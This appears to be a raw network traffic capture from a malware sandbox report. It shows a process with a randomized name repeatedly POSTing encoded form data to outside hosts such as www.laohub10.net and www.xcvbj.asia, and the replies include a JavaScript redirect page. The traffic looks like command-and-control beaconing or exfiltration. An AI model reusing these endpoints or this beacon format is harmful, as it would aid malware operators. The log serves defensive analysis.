                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                   Dec 4, 2024 12:49:34.577559948 CET | 1236 | IN | Data Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                  Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                                   Dec 4, 2024 12:49:34.577574968 CET | 698 | IN | Data Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                                  Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                   1 | 192.168.2.4 | 49737 | 27.124.4.246 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                   Dec 4, 2024 12:49:50.794718981 CET | 751 | OUT | POST /sgdd/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.laohub10.net
                                                                  Origin: http://www.laohub10.net
                                                                  Referer: http://www.laohub10.net/sgdd/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 204
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 71 33 44 38 31 64 48 54 67 48 57 32 6a 59 73 72 6b 77 50 4a 52 64 37 46 6c 50 47 57 48 6e 59 4c 39 47 34 63 70 6d 52 67 66 50 38 6f 4f 32 44 6e 4f 65 5a 41 49 76 79 58 48 2b 62 71 35 46 30 39 4f 72 32 55 78 73 7a 59 59 46 4c 2b 6d 59 51 42 56 62 2b 34 42 68 2f 42 45 78 64 77 73 34 39 68 70 55 33 41 44 31 4a 2b 41 32 56 4b 41 33 39 76 53 76 2b 44 64 2b 67 6a 59 37 72 31 4a 64 71 32 4d 6e 5a 56 4a 69 59 77 69 4f 36 65 39 69 46 77 39 50 64 70 78 6b 76 61 69 2b 6f 73 4d 4f 77 4c 65 72 43 51 62 46 49 61 6a 76 6b 58 62 56 48 34 76 68 65 75 2b 47 44 4d 69 71 6d 67 64 31 69 59 41 77 3d 3d
                                                                  Data Ascii: BTPDLZX=q3D81dHTgHW2jYsrkwPJRd7FlPGWHnYL9G4cpmRgfP8oO2DnOeZAIvyXH+bq5F09Or2UxszYYFL+mYQBVb+4Bh/BExdws49hpU3AD1J+A2VKA39vSv+Dd+gjY7r1Jdq2MnZVJiYwiO6e9iFw9Pdpxkvai+osMOwLerCQbFIajvkXbVH4vheu+GDMiqmgd1iYAw==
                                                                   Dec 4, 2024 12:49:52.176594973 CET | 525 | IN | HTTP/1.1 200 OK
                                                                  Server: Apache
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Accept-Ranges: bytes
                                                                  Cache-Control: max-age=86400
                                                                  Age: 1
                                                                  Connection: Close
                                                                  Content-Length: 350
                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                                  Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                   2 | 192.168.2.4 | 49738 | 27.124.4.246 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                   Dec 4, 2024 12:49:53.451234102 CET | 771 | OUT | POST /sgdd/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.laohub10.net
                                                                  Origin: http://www.laohub10.net
                                                                  Referer: http://www.laohub10.net/sgdd/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 224
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 71 33 44 38 31 64 48 54 67 48 57 32 69 37 30 72 69 54 33 4a 55 39 37 47 37 66 47 57 4f 48 59 50 39 47 30 63 70 6a 31 77 65 36 55 6f 50 53 48 6e 66 76 5a 41 4c 76 79 58 66 75 62 76 7a 6c 30 4d 4f 72 4b 6d 78 74 50 59 59 46 50 2b 6d 63 55 42 55 70 57 37 54 68 2f 44 4d 52 64 32 76 49 39 68 70 55 33 41 44 31 64 55 41 32 64 4b 41 6e 4e 76 53 4c 54 78 44 4f 67 67 52 62 72 31 65 4e 71 79 4d 6e 5a 6a 4a 6e 41 61 69 4d 43 65 39 67 4e 77 39 65 64 75 34 6b 75 52 6d 2b 70 62 43 4f 64 42 66 61 37 6a 51 6b 73 71 38 62 6b 52 58 7a 4b 69 2b 51 2f 35 73 47 6e 2f 2f 74 76 55 51 32 66 52 62 33 46 71 64 6c 41 46 69 79 31 73 47 45 78 36 53 47 74 2f 30 61 63 3d
                                                                  Data Ascii: BTPDLZX=q3D81dHTgHW2i70riT3JU97G7fGWOHYP9G0cpj1we6UoPSHnfvZALvyXfubvzl0MOrKmxtPYYFP+mcUBUpW7Th/DMRd2vI9hpU3AD1dUA2dKAnNvSLTxDOggRbr1eNqyMnZjJnAaiMCe9gNw9edu4kuRm+pbCOdBfa7jQksq8bkRXzKi+Q/5sGn//tvUQ2fRb3FqdlAFiy1sGEx6SGt/0ac=
                                                                   Dec 4, 2024 12:49:54.790479898 CET | 525 | IN | HTTP/1.1 200 OK
                                                                  Server: Apache
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Accept-Ranges: bytes
                                                                  Cache-Control: max-age=86400
                                                                  Age: 1
                                                                  Connection: Close
                                                                  Content-Length: 350
                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                                  Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                   3 | 192.168.2.4 | 49739 | 27.124.4.246 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                   Dec 4, 2024 12:49:56.106270075 CET | 10853 | OUT | POST /sgdd/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.laohub10.net
                                                                  Origin: http://www.laohub10.net
                                                                  Referer: http://www.laohub10.net/sgdd/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 10304
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 71 33 44 38 31 64 48 54 67 48 57 32 69 37 30 72 69 54 33 4a 55 39 37 47 37 66 47 57 4f 48 59 50 39 47 30 63 70 6a 31 77 65 38 4d 6f 50 6e 54 6e 4e 38 78 41 4b 76 79 58 54 4f 62 75 7a 6c 30 52 4f 72 6a 74 78 74 43 6a 59 47 6e 2b 70 5a 41 42 54 59 57 37 4a 78 2f 44 54 68 64 7a 73 34 38 6a 70 56 61 4a 44 31 4e 55 41 32 64 4b 41 6b 56 76 62 2f 2f 78 42 4f 67 6a 59 37 72 35 4a 64 72 58 4d 6d 78 7a 4a 6d 51 67 6a 34 2b 65 2b 41 64 77 2b 73 31 75 33 6b 75 54 71 65 70 44 43 4f 52 43 66 61 6d 59 51 6b 59 54 38 63 55 52 48 6d 37 6e 6b 67 44 67 35 56 6e 63 67 61 66 5a 64 30 54 70 53 46 70 68 53 31 67 6a 34 7a 46 46 46 45 34 67 46 32 31 41 6c 73 7a 33 47 55 66 57 2b 76 4c 4f 76 73 4d 66 4e 2f 75 75 52 6a 61 6a 6e 77 6b 32 77 37 42 70 5a 48 48 36 33 71 4e 2b 49 66 6c 72 6d 4d 68 2f 6c 4b 47 68 6a 77 55 4c 63 34 37 38 35 52 6d 75 52 39 6c 41 6b 68 45 48 50 35 41 73 50 2b 36 47 36 56 65 7a 55 72 6b 49 2b 6a 43 55 43 6e 6e 73 44 45 74 42 30 6e 32 4c 66 7a 30 45 76 74 35 48 38 72 34 70 53 42 [TRUNCATED]
                                                                   Data Ascii: BTPDLZX=q3D81dHTgHW2i70riT3JU97G7fGWOHYP9G0cpj1we8MoPnTnN8xAKvyXTObuzl0ROrjtxtCjYGn+pZABTYW7Jx/DThdzs48jpVaJD1NUA2dKAkVvb//xBOgjY7r5JdrXMmxzJmQgj4+e+Adw+s1u3kuTqepDCORCfamYQkYT8cURHm7nkgDg5VncgafZd0TpSFphS1gj4zFFFE4gF21Alsz3GUfW+vLOvsMfN/uuRjajnwk2w7BpZHH63qN+IflrmMh/lKGhjwULc4785RmuR9lAkhEHP5AsP+6G6VezUrkI+jCUCnnsDEtB0n2Lfz0Evt5H8r4pSB [TRUNCATED]
                                                                   Dec 4, 2024 12:49:57.449558020 CET | 525 | IN | HTTP/1.1 200 OK
                                                                  Server: Apache
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Accept-Ranges: bytes
                                                                  Cache-Control: max-age=86400
                                                                  Age: 1
                                                                  Connection: Close
                                                                  Content-Length: 350
                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                                  Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                   4 | 192.168.2.4 | 49742 | 27.124.4.246 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                   Dec 4, 2024 12:49:58.757409096 CET | 483 | OUT | GET /sgdd/?BTPDLZX=n1rc2pzYlnLUqZJl2DrPSNjVvvG+B3kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZSkv0BSFGr8wnshHLEWZTEWF2XmR1RoCWC90=&WnQdf=JhLPW HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US
                                                                  Host: www.laohub10.net
                                                                  Connection: close
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                   Dec 4, 2024 12:50:00.105895996 CET | 525 | IN | HTTP/1.1 200 OK
                                                                  Server: Apache
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Accept-Ranges: bytes
                                                                  Cache-Control: max-age=86400
                                                                  Age: 1
                                                                  Connection: Close
                                                                  Content-Length: 350
                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                                  Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                   5 | 192.168.2.4 | 49763 | 149.88.81.190 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                   Dec 4, 2024 12:50:06.831717968 CET | 745 | OUT | POST /rq1s/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.xcvbj.asia
                                                                  Origin: http://www.xcvbj.asia
                                                                  Referer: http://www.xcvbj.asia/rq1s/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 204
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 6d 73 79 56 74 71 48 67 47 4a 33 6e 30 6e 2b 6c 65 58 2f 62 76 58 31 6d 69 43 48 37 42 35 53 36 6b 4e 68 56 4e 47 75 73 65 31 2f 31 6d 36 6f 63 4f 4d 76 6e 76 7a 63 4d 5a 30 45 53 76 6e 6b 31 39 79 59 67 31 42 33 73 61 6f 32 67 79 70 45 6e 64 71 2f 74 6f 42 30 53 79 43 57 4e 41 73 4c 51 71 74 6f 74 61 57 59 77 68 32 31 73 51 75 57 64 76 6e 6b 4e 4b 53 7a 42 4f 4b 79 47 6e 64 46 75 49 61 44 48 2f 41 2b 44 38 4a 79 39 2b 58 4c 35 75 68 6e 4a 32 2b 46 4d 6b 32 47 67 6c 6d 31 72 57 78 68 2b 44 7a 70 4d 4d 33 43 55 2f 5a 6f 53 32 55 37 6e 77 3d 3d
                                                                  Data Ascii: BTPDLZX=xj4K+ejgT/JOWmsyVtqHgGJ3n0n+leX/bvX1miCH7B5S6kNhVNGuse1/1m6ocOMvnvzcMZ0ESvnk19yYg1B3sao2gypEndq/toB0SyCWNAsLQqtotaWYwh21sQuWdvnkNKSzBOKyGndFuIaDH/A+D8Jy9+XL5uhnJ2+FMk2Gglm1rWxh+DzpMM3CU/ZoS2U7nw==
                                                                   Dec 4, 2024 12:50:08.322623968 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:50:08 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                   6 | 192.168.2.4 | 49769 | 149.88.81.190 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                   Dec 4, 2024 12:50:09.499576092 CET | 765 | OUT | POST /rq1s/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.xcvbj.asia
                                                                  Origin: http://www.xcvbj.asia
                                                                  Referer: http://www.xcvbj.asia/rq1s/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 224
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 48 63 79 55 4d 71 48 6f 47 4a 34 69 30 6e 2b 77 75 58 7a 62 76 62 31 6d 6a 32 58 37 55 52 53 6a 41 42 68 62 70 61 75 67 2b 31 2f 39 47 36 70 53 75 4d 6b 6e 76 32 70 4d 59 59 45 53 72 50 6b 31 2f 36 59 68 47 70 30 75 4b 6f 6a 35 43 70 47 6a 64 71 2f 74 6f 42 30 53 79 6e 37 4e 42 49 4c 4d 4c 64 6f 73 37 57 62 7a 68 32 79 72 51 75 57 5a 76 6e 67 4e 4b 53 30 42 4c 54 36 47 6b 31 46 75 49 4b 44 47 75 41 2f 5a 73 4a 38 35 2b 57 65 35 64 56 6a 42 57 2f 6b 53 43 6d 46 6d 30 4b 75 71 51 38 37 76 79 53 2b 65 4d 54 78 4a 34 51 63 66 31 70 79 38 34 55 44 63 56 79 78 4a 6f 64 58 76 78 46 75 41 59 6d 74 58 4e 59 3d
                                                                  Data Ascii: BTPDLZX=xj4K+ejgT/JOWHcyUMqHoGJ4i0n+wuXzbvb1mj2X7URSjABhbpaug+1/9G6pSuMknv2pMYYESrPk1/6YhGp0uKoj5CpGjdq/toB0Syn7NBILMLdos7Wbzh2yrQuWZvngNKS0BLT6Gk1FuIKDGuA/ZsJ85+We5dVjBW/kSCmFm0KuqQ87vyS+eMTxJ4Qcf1py84UDcVyxJodXvxFuAYmtXNY=
                                                                   Dec 4, 2024 12:50:11.032449961 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:50:10 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: close
